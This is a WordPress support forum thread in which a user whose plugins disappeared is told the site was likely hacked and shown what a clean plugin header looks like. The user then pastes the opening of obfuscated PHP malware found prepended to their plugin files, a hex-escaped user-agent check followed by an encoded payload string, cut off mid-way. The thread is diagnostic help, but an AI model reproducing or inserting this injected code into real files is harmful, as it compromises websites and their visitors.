Moderator
Jan Dembowski
(@jdembowski)
Forum Moderator and Brute Squad
Why do you think you’ve not been hacked? Under no circumstances would any upgrade wipe out all of your plugins that way.
Do you or your host have backups? When you try and re-add those plugins are you getting any error messages?
I have run the exploit plugin and checked for zesk in .php files. I have also used an online malware checker. When I install new plugins I get no errors.
Unfortunately malware scans are not 100% accurate. Can you check the first few lines of the old main plugin files. So if you have a plugin called “myplug”, look at:
wp-content/plugins/myplug/myplug.php. You should see something in this format:
<?php
/*
Plugin Name: myplug
Plugin URI: http://domain.com/myplug/
Description: myplug does this and that.
Version: 1.1.9
Author: A Person
Author URI: http://domain.com/
Text Domain: myplug
Domain Path: /lang
*/
function .......
I have seen cases where there is some other code at the very beginning of the file, if so this is a hack, and causes the problem you describe.
ok, i have checked several php files and they all begin with code like this:
<?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]); if ((! strstr($ua,"\x6d\163\x69\145")) and (! strstr($ua,"\x72\166\x3a\61\x31"))) $GLOBALS["\x61\156\x75\156\x61"]=1; } ?><?php $aawdhhcnjt = 'VPFNJU,6<*27-SFGTOBS7y]672]48y]#>s%x5c%x7825<#462]47y]252]18y]#>q%x5c%x7825<5c%x7825mm)%x5c%x7825%x5c%x7878:-!%x5c%x7825tV%x5c%x787f%x5c%x787f%x5c%x787f%x5c%x787f<u%x5c%x7825V%x5c%x7827{ftmfVx5c%x7825z!>2<!gps)%x5c%x7825j>1<%x5c%x7825j=6[%x5c%x7825wR85,67R37,18R#>q%x5c25b:>%x5c%x7825s:%x5c%x785c%xx5c%x782f!**#sfmcnbs+yfeobz+sfwjidsb%x5c%x7860bj%x7825!*9!%x5c%x7827!hmg%x5c%x7825)!gj!~<ofmy%vufs!|ftmf!~<**9.-j%x5c%x78gj!|!*msv%x5c%x7825)}k~~~<ftmbg!os%x5c%x787f_*#[k2%x5c%x7860{6:!}7;!}6;#825t2w)##Qtjw)#]82#-#!#-%x5c%x7825tmw)%x5c%x7825tww**WYsboepn)%x5c%x24-!%x5c%x7825%x5c%x7824-%x5c%x7824*!|!%x5c%x7824-%x5c%x7824x5c%x7825!*3!%x5c%x785c%x7825b:>1<!gps)%x5c%x7825j:>1<%x5c%x7825j:=tj{fpg)%x5c%x7825%x64%145%x28%141%x72%162%xx7824-%x5c%x7824]26%x5c%x7824-%x5c%x7824<%x5c%x7825%x5c%x7825hIr%x5c%x785c1^-%x5c%x7%x7827tfs%x5c%x78256<*17-SFEBFI,6<*127-U23zbek!~!<b%x5c%x7825%x5c%x787f!<X>b%x5c%x78946:ce44#)zbssb!>!ssbnpe_GMFT%x5c%x7860QIQ&f_UTPI%x5c%x786#0#)idubn%x5c%x7860hfsq)!x5c%x7825)kV%x5c%x7878{**#k#)tutjyf%x5c%x786FGFS%x5c%x7860QUUI&c_UOFHB%x5c%x7dy)##-!#~<%x5c%x7825h00#*
etc, etc…
what do I need to do to resolve this? can i just strip out all this code?
